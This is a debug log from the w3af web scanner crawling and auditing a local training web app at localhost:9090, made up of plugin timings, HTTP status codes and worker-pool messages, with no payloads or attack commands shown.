form_cleartext_password.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.10s to run [Wed Feb 12 09:36:47 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:36:47 2020 - debug] serialized_object.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] blank_body.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] credit_cards.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] websockets_links.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] csp.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] dom_xss.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/a2_broken_auth" [Wed Feb 12 09:36:47 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" [Wed Feb 12 09:36:47 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] keys.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.01s to run [Wed Feb 12 09:36:47 2020 - debug] clamav.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] html_comments.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.01s to run [Wed Feb 12 09:36:47 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] url_session.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] web_spider will ignore maxcdn.bootstrapcdn.com (different domain name) [Wed Feb 12 09:36:47 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 09:36:47 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] objects.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] error_500.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] meta_tags.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] password_profiling.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] click_jacking.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] lang.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] vulners_db.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.09s to run [Wed Feb 12 09:36:47 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] localhost:9090 connection pool stats (free:46 / in_use:4 / max:50 / total:50) [Wed Feb 12 09:36:47 2020 - debug] Connections with more in use time: (7b389725bee04a75, 0.06 sec) (f5adb0c09c70ca09, 0.03 sec) (450aace75c9d8a42, 0.00 sec) (955b76b517b2a7f0, 0.00 sec) [Wed Feb 12 09:36:47 2020 - debug] error_pages.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.09s to run [Wed Feb 12 09:36:47 2020 - debug] strange_reason.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] cache_control.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] strange_headers.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] ssn.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] oracle.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] feeds.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.12s to run [Wed Feb 12 09:36:47 2020 - debug] GET http://localhost:9090/learn/vulnerability/ax_csrf returned HTTP code "200" (id=656,from_cache=0,grep=0,rtt=0.19,did=c6eOd1QS) [Wed Feb 12 09:36:47 2020 - debug] GET http://localhost:9090/logout returned HTTP code "302" (id=652,from_cache=0,grep=0,rtt=0.18,did=4lQv6SI2) [Wed Feb 12 09:36:47 2020 - debug] GET http://localhost:9090/learn/vulnerability/a6_sec_misconf returned HTTP code "200" (id=660,from_cache=0,grep=0,rtt=0.51,did=x4kN16FS) [Wed Feb 12 09:36:47 2020 - debug] GET http://localhost:9090/assets/fa/css/font-awesome.min.css returned HTTP code "200" (id=659,from_cache=0,grep=0,rtt=0.48,did=xjKuwIMb) [Wed Feb 12 09:36:47 2020 - debug] symfony.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] GET http://localhost:9090/learn/vulnerability/a2_broken_auth returned HTTP code "200" (id=654,from_cache=0,grep=0,rtt=0.22,did=8jRSCZB8) [Wed Feb 12 09:36:47 2020 - debug] file_upload.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=653,from_cache=0,grep=0,rtt=0.18,did=9FcxdkON) [Wed Feb 12 09:36:47 2020 - debug] GET http://localhost:9090/assets/jquery-3.2.1.min.js returned HTTP code "200" (id=661,from_cache=0,grep=0,rtt=0.51,did=4RM8zRUE) [Wed Feb 12 09:36:47 2020 - debug] GET http://localhost:9090/learn/vulnerability/a9_vuln_component returned HTTP code "200" (id=651,from_cache=0,grep=0,rtt=0.17,did=h29ArWWf) [Wed Feb 12 09:36:47 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=664,from_cache=1,grep=0,rtt=0.33,did=Yec3p6Ss) [Wed Feb 12 09:36:47 2020 - debug] "http://localhost:9090/" (id:664, code:302, len:28, did:Yec3p6Ss) is NOT a 404 [URL 404 cache] [Wed Feb 12 09:36:47 2020 - debug] [web_spider] Found new link "http://localhost:9090/" at "http://localhost:9090/learn" [Wed Feb 12 09:36:47 2020 - debug] GET http://localhost:9090/assets/showdown.min.js returned HTTP code "200" (id=657,from_cache=0,grep=0,rtt=0.35,did=Gg81hhye) [Wed Feb 12 09:36:47 2020 - debug] GET http://localhost:9090/learn/vulnerability/a3_sensitive_data returned HTTP code "200" (id=658,from_cache=0,grep=0,rtt=0.35,did=DyXZ1s5f) [Wed Feb 12 09:36:47 2020 - debug] GET http://localhost:9090/learn/vulnerability/a10_logging returned HTTP code "200" (id=662,from_cache=0,grep=0,rtt=0.49,did=Ld2pW7G8) [Wed Feb 12 09:36:47 2020 - debug] GET http://localhost:9090/learn/vulnerability/a8_ides returned HTTP code "200" (id=665,from_cache=0,grep=0,rtt=0.61,did=ljCizzbr) [Wed Feb 12 09:36:47 2020 - debug] GET http://localhost:9090/learn/vulnerability/a4_xxe returned HTTP code "200" (id=663,from_cache=0,grep=0,rtt=0.59,did=YebHoXmn) [Wed Feb 12 09:36:47 2020 - debug] get_emails.grep(uri="http://localhost:9090/execute.xml") took 1.16s to run [Wed Feb 12 09:36:47 2020 - debug] expect_ct.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] svn_users.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] Finished CSV parsing. [Wed Feb 12 09:36:47 2020 - debug] phishtank.discover(did="oGBZG4EY",uri="http://localhost:9090/") took 9.65s to run [Wed Feb 12 09:36:47 2020 - debug] private_ip.grep(uri="http://localhost:9090/gears_config") took 0.04s to run [Wed Feb 12 09:36:47 2020 - debug] motw.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] meta_generator.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] "http://localhost:9090/logout" (id:652, code:302, len:23, did:4lQv6SI2) is NOT a 404 [known 404 with ID 359 uses 404 code] [Wed Feb 12 09:36:47 2020 - debug] [web_spider] Found new link "http://localhost:9090/logout" at "http://localhost:9090/learn" [Wed Feb 12 09:36:47 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/" [Wed Feb 12 09:36:47 2020 - debug] New fuzzable request identified: "Method: GET | http://localhost:9090/" [Wed Feb 12 09:36:47 2020 - information] New URL found by web_spider plugin: "http://localhost:9090/" [Wed Feb 12 09:36:47 2020 - debug] oracle_discovery.discover(http://localhost:9090/learn, did=DaSPQE8G) [Wed Feb 12 09:36:47 2020 - debug] [oracle_discovery] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:47 2020 - debug] The crawl plugin: "oracle_discovery" wont be run anymore. [Wed Feb 12 09:36:47 2020 - debug] Starting CrawlInfra consumer _teardown() with 1 plugins [Wed Feb 12 09:36:47 2020 - debug] Calling oracle_discovery.end() [Wed Feb 12 09:36:47 2020 - debug] Spent 0.00 seconds running oracle_discovery.end() [Wed Feb 12 09:36:47 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:47 2020 - debug] oracle_discovery.discover(did="DaSPQE8G",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] GET http://localhost:9090/learn/vulnerability/a5_broken_access_control returned HTTP code "200" (id=667,from_cache=0,grep=0,rtt=0.68,did=Frjg2cpp) [Wed Feb 12 09:36:47 2020 - debug] GET http://localhost:9090/learn/vulnerability/ax_redirect returned HTTP code "200" (id=655,from_cache=0,grep=0,rtt=0.19,did=BVoRaRJQ) [Wed Feb 12 09:36:47 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/logout" [Wed Feb 12 09:36:47 2020 - debug] GET http://localhost:9090/learn/vulnerability/a7_xss returned HTTP code "200" (id=666,from_cache=0,grep=0,rtt=0.42,did=LsySxjqV) [Wed Feb 12 09:36:47 2020 - debug] wsdl_finder.discover(http://localhost:9090/learn, did=GeQ6rgaX) [Wed Feb 12 09:36:47 2020 - debug] [wsdl_finder] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:47 2020 - debug] New fuzzable request identified: "Method: GET | http://localhost:9090/logout" [Wed Feb 12 09:36:47 2020 - information] New URL found by web_spider plugin: "http://localhost:9090/logout" [Wed Feb 12 09:36:47 2020 - debug] GET http://localhost:9090/learn returned HTTP code "200" (id=668,from_cache=0,grep=1,rtt=0.14,did=8EiGmNHP) [Wed Feb 12 09:36:47 2020 - debug] http_in_body.grep(uri="http://localhost:9090/gears_config") took 0.49s to run [Wed Feb 12 09:36:47 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=669,from_cache=0,grep=0,rtt=0.06,did=iTVaZDJb) [Wed Feb 12 09:36:47 2020 - debug] file_upload.audit(did="dLX02iYh", uri="http://localhost:9090/") [Wed Feb 12 09:36:47 2020 - debug] file_upload.audit(did="dLX02iYh",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/gears_config") took 0.09s to run [Wed Feb 12 09:36:47 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:36:47 2020 - debug] serialized_object.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] blank_body.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] credit_cards.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] websockets_links.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] csp.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] dom_xss.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] vulners_db.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] keys.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] GET http://localhost:9090/learn?wsdl= returned HTTP code "200" (id=670,from_cache=0,grep=1,rtt=0.12,did=Y9PbGOxu) [Wed Feb 12 09:36:47 2020 - debug] GET http://localhost:9090/learn?WSDL= returned HTTP code "200" (id=671,from_cache=0,grep=1,rtt=0.09,did=0vGvIbRj) [Wed Feb 12 09:36:47 2020 - debug] wsdl_finder.discover(did="GeQ6rgaX",uri="http://localhost:9090/learn") took 0.34s to run [Wed Feb 12 09:36:47 2020 - debug] wordpress_enumerate_users.discover(http://localhost:9090/learn, did=oVtR6jzI) [Wed Feb 12 09:36:47 2020 - debug] [wordpress_enumerate_users] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:47 2020 - debug] GET http://localhost:9090/learn/vulnerability/xa_crsf returned HTTP code "404" (id=672,from_cache=0,grep=0,rtt=0.10,did=c6eOd1QS) [Wed Feb 12 09:36:47 2020 - debug] Received response for 404 URL http://localhost:9090/learn/vulnerability/xa_crsf (id:672, did:c6eOd1QS, len:3) [Wed Feb 12 09:36:47 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/gears_config") took 0.15s to run [Wed Feb 12 09:36:47 2020 - debug] clamav.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] csrf.audit(did="NWeojpu9", uri="http://localhost:9090/") [Wed Feb 12 09:36:47 2020 - debug] deserialization.audit(did="7ztA14Kv", uri="http://localhost:9090/") [Wed Feb 12 09:36:47 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:47 2020 - debug] html_comments.grep(uri="http://localhost:9090/gears_config") took 0.04s to run [Wed Feb 12 09:36:47 2020 - debug] csrf.audit(did="NWeojpu9",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] deserialization.audit(did="7ztA14Kv",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:47 2020 - debug] os_commanding.audit(did="Qt8Ly2EY", uri="http://localhost:9090/") [Wed Feb 12 09:36:47 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:48 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:48 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:Qt8Ly2EY) [Wed Feb 12 09:36:48 2020 - debug] lfi.audit(did="P4IA1pnS", uri="http://localhost:9090/") [Wed Feb 12 09:36:48 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:48 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:P4IA1pnS) [Wed Feb 12 09:36:48 2020 - debug] GET http://localhost:9090/assets/qjueyr-3.2.1.min.js returned HTTP code "404" (id=675,from_cache=0,grep=0,rtt=0.06,did=4RM8zRUE) [Wed Feb 12 09:36:48 2020 - debug] Received response for 404 URL http://localhost:9090/assets/qjueyr-3.2.1.min.js (id:675, did:4RM8zRUE, len:165) [Wed Feb 12 09:36:48 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:48 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:48 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=131 returned HTTP code "200" (id=673,from_cache=0,grep=0,rtt=0.90,did=GKredvSk) [Wed Feb 12 09:36:48 2020 - debug] GET http://localhost:9090/assets/fa/css/ofnt-awesome.min.css returned HTTP code "404" (id=674,from_cache=0,grep=0,rtt=0.14,did=xjKuwIMb) [Wed Feb 12 09:36:48 2020 - debug] Received response for 404 URL http://localhost:9090/assets/fa/css/ofnt-awesome.min.css (id:674, did:xjKuwIMb, len:173) [Wed Feb 12 09:36:48 2020 - debug] lfi.audit(did="P4IA1pnS",uri="http://localhost:9090/") took 0.05s to run [Wed Feb 12 09:36:48 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/gears_config") took 0.17s to run [Wed Feb 12 09:36:48 2020 - debug] sqli.audit(did="4ggxbRQy", uri="http://localhost:9090/") [Wed Feb 12 09:36:48 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:48 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:4ggxbRQy) [Wed Feb 12 09:36:48 2020 - debug] os_commanding.audit(did="Qt8Ly2EY",uri="http://localhost:9090/") took 0.17s to run [Wed Feb 12 09:36:48 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/gears_config") took 0.03s to run [Wed Feb 12 09:36:48 2020 - debug] "http://localhost:9090/learn/vulnerability/ax_csrf" (id:656, code:200, len:7712, did:c6eOd1QS) is NOT a 404 [known 404 with ID 672 uses 404 code] [Wed Feb 12 09:36:48 2020 - debug] [web_spider] Found new link "http://localhost:9090/learn/vulnerability/ax_csrf" at "http://localhost:9090/learn" [Wed Feb 12 09:36:48 2020 - debug] url_session.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:48 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:48 2020 - debug] objects.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:48 2020 - debug] error_500.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:48 2020 - debug] meta_tags.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:48 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" [Wed Feb 12 09:36:48 2020 - debug] blind_sqli.audit(did="qm4FiaGc", uri="http://localhost:9090/") [Wed Feb 12 09:36:48 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:48 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:48 2020 - debug] blind_sqli.audit(did="qm4FiaGc",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:48 2020 - debug] sqli.audit(did="4ggxbRQy",uri="http://localhost:9090/") took 0.03s to run [Wed Feb 12 09:36:48 2020 - debug] New fuzzable request identified: "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" [Wed Feb 12 09:36:48 2020 - information] New URL found by web_spider plugin: "http://localhost:9090/learn/vulnerability/ax_csrf" [Wed Feb 12 09:36:48 2020 - debug] get_emails.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 1.75s to run [Wed Feb 12 09:36:48 2020 - debug] click_jacking.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:48 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:48 2020 - debug] lang.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:48 2020 - debug] password_profiling.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:48 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:48 2020 - debug] phishing_vector.audit(did="JZoPrIjy", uri="http://localhost:9090/") [Wed Feb 12 09:36:48 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:48 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:JZoPrIjy) [Wed Feb 12 09:36:48 2020 - debug] Waited 0.99 seconds in PreventMultipleThreads for event 140100600451792 and normalized path http://localhost:9090/learn/vulnerability/filename (did:ljCizzbr) [Wed Feb 12 09:36:48 2020 - debug] Waited 0.92 seconds in PreventMultipleThreads for event 140100600451792 and normalized path http://localhost:9090/learn/vulnerability/filename (did:Ld2pW7G8) [Wed Feb 12 09:36:48 2020 - debug] Waited 0.99 seconds in PreventMultipleThreads for event 140100600451792 and normalized path http://localhost:9090/learn/vulnerability/filename (did:YebHoXmn) [Wed Feb 12 09:36:48 2020 - debug] Waited 0.89 seconds in PreventMultipleThreads for event 140100600451792 and normalized path http://localhost:9090/learn/vulnerability/filename (did:Frjg2cpp) [Wed Feb 12 09:36:48 2020 - debug] Waited 1.07 seconds in PreventMultipleThreads for event 140100600451792 and normalized path http://localhost:9090/learn/vulnerability/filename (did:9FcxdkON) [Wed Feb 12 09:36:48 2020 - debug] Waited 1.03 seconds in PreventMultipleThreads for event 140100600451792 and normalized path http://localhost:9090/learn/vulnerability/filename (did:DyXZ1s5f) [Wed Feb 12 09:36:48 2020 - debug] Waited 0.82 seconds in PreventMultipleThreads for event 140100600451792 and normalized path http://localhost:9090/learn/vulnerability/filename (did:LsySxjqV) [Wed Feb 12 09:36:48 2020 - debug] Waited 1.03 seconds in PreventMultipleThreads for event 140100600451792 and normalized path http://localhost:9090/learn/vulnerability/filename (did:x4kN16FS) [Wed Feb 12 09:36:48 2020 - debug] Waited 0.81 seconds in PreventMultipleThreads for event 140100600451792 and normalized path http://localhost:9090/learn/vulnerability/filename (did:BVoRaRJQ) [Wed Feb 12 09:36:48 2020 - debug] Waited 1.05 seconds in PreventMultipleThreads for event 140100600451792 and normalized path http://localhost:9090/learn/vulnerability/filename (did:h29ArWWf) [Wed Feb 12 09:36:48 2020 - debug] Waited 1.13 seconds in PreventMultipleThreads for event 140100600451792 and normalized path http://localhost:9090/learn/vulnerability/filename (did:8jRSCZB8) [Wed Feb 12 09:36:48 2020 - debug] "http://localhost:9090/assets/jquery-3.2.1.min.js" (id:661, code:200, len:86659, did:4RM8zRUE) is NOT a 404 [known 404 with ID 675 uses 404 code] [Wed Feb 12 09:36:48 2020 - debug] [web_spider] Found new link "http://localhost:9090/assets/jquery-3.2.1.min.js" at "http://localhost:9090/learn" [Wed Feb 12 09:36:48 2020 - debug] error_pages.grep(uri="http://localhost:9090/gears_config") took 0.03s to run [Wed Feb 12 09:36:48 2020 - debug] strange_reason.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:48 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:48 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:48 2020 - debug] cache_control.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:48 2020 - debug] strange_headers.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:48 2020 - debug] ssn.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:48 2020 - debug] oracle.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:48 2020 - debug] feeds.grep(uri="http://localhost:9090/gears_config") took 0.00s to run [Wed Feb 12 09:36:48 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" [Wed Feb 12 09:36:48 2020 - debug] generic.audit(did="iQTkWxZ2", uri="http://localhost:9090/") [Wed Feb 12 09:36:48 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:48 2020 - debug] generic.audit(did="iQTkWxZ2",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:48 2020 - debug] format_string.audit(did="HpetVAIl", uri="http://localhost:9090/") [Wed Feb 12 09:36:48 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:48 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:HpetVAIl) [Wed Feb 12 09:36:48 2020 - debug] Finished audit.phishing_vector (did=JZoPrIjy) [Wed Feb 12 09:36:48 2020 - debug] phishing_vector.audit(did="JZoPrIjy",uri="http://localhost:9090/") took 0.06s to run [Wed Feb 12 09:36:48 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/gears_config") took 0.02s to run [Wed Feb 12 09:36:48 2020 - debug] Waited 1.08 seconds in PreventMultipleThreads for event 140100600454544 and normalized path http://localhost:9090/assets/filename.js (did:Gg81hhye) [Wed Feb 12 09:36:48 2020 - debug] "http://localhost:9090/assets/showdown.min.js" (id:657, code:200, len:37529, did:Gg81hhye) is NOT a 404 [known 404 with ID 675 uses 404 code] [Wed Feb 12 09:36:48 2020 - debug] [web_spider] Found new link "http://localhost:9090/assets/showdown.min.js" at "http://localhost:9090/learn" [Wed Feb 12 09:36:48 2020 - debug] Worker with ID GrepWorker(XRNlNlu5) has been running job 11 for 32.45 seconds. The job is: _run_one_plugin('retirejs', 25, kwargs={}) [Wed Feb 12 09:36:49 2020 - debug] Worker with ID GrepWorker(SyXCPA2t) has been running job 326 for 25.27 seconds. The job is: _run_one_plugin('retirejs', 35, kwargs={}) [Wed Feb 12 09:36:49 2020 - debug] Worker with ID GrepWorker(2XKnj13Q) has been running job 251 for 29.13 seconds. The job is: _run_one_plugin('retirejs', 33, kwargs={}) [Wed Feb 12 09:36:49 2020 - debug] Worker with ID GrepWorker(qExgSbEO) has been running job 81 for 31.54 seconds. The job is: _run_one_plugin('retirejs', 31, kwargs={}) [Wed Feb 12 09:36:49 2020 - debug] Worker with ID GrepWorker(MDWE44QH) has been running job 161 for 30.88 seconds. The job is: _run_one_plugin('retirejs', 32, kwargs={}) [Wed Feb 12 09:36:49 2020 - debug] 0% of GrepWorker workers are idle. [Wed Feb 12 09:36:49 2020 - debug] GrepWorker worker pool internal thread state: (worker: True, task: True, result: True) [Wed Feb 12 09:36:49 2020 - debug] GrepWorker worker pool has 29 tasks in inqueue and 0 tasks in outqueue [Wed Feb 12 09:36:49 2020 - debug] "http://localhost:9090/learn/vulnerability/a1_injection" (id:653, code:200, len:9025, did:9FcxdkON) is NOT a 404 [known 404 with ID 672 uses 404 code] [Wed Feb 12 09:36:49 2020 - debug] [web_spider] Found new link "http://localhost:9090/learn/vulnerability/a1_injection" at "http://localhost:9090/learn" [Wed Feb 12 09:36:49 2020 - debug] "http://localhost:9090/assets/fa/css/font-awesome.min.css" (id:659, code:200, len:31000, did:xjKuwIMb) is NOT a 404 [known 404 with ID 674 uses 404 code] [Wed Feb 12 09:36:49 2020 - debug] [web_spider] Found new link "http://localhost:9090/assets/fa/css/font-awesome.min.css" at "http://localhost:9090/learn" [Wed Feb 12 09:36:49 2020 - debug] New fuzzable request identified: "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" [Wed Feb 12 09:36:49 2020 - information] New URL found by web_spider plugin: "http://localhost:9090/assets/jquery-3.2.1.min.js" [Wed Feb 12 09:36:49 2020 - debug] format_string.audit(did="HpetVAIl",uri="http://localhost:9090/") took 0.18s to run [Wed Feb 12 09:36:49 2020 - debug] symfony.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:49 2020 - debug] websocket_hijacking.audit(did="AeSLAQDy", uri="http://localhost:9090/") [Wed Feb 12 09:36:49 2020 - debug] "http://localhost:9090/learn/vulnerability/a8_ides" (id:665, code:200, len:7751, did:ljCizzbr) is NOT a 404 [known 404 with ID 672 uses 404 code] 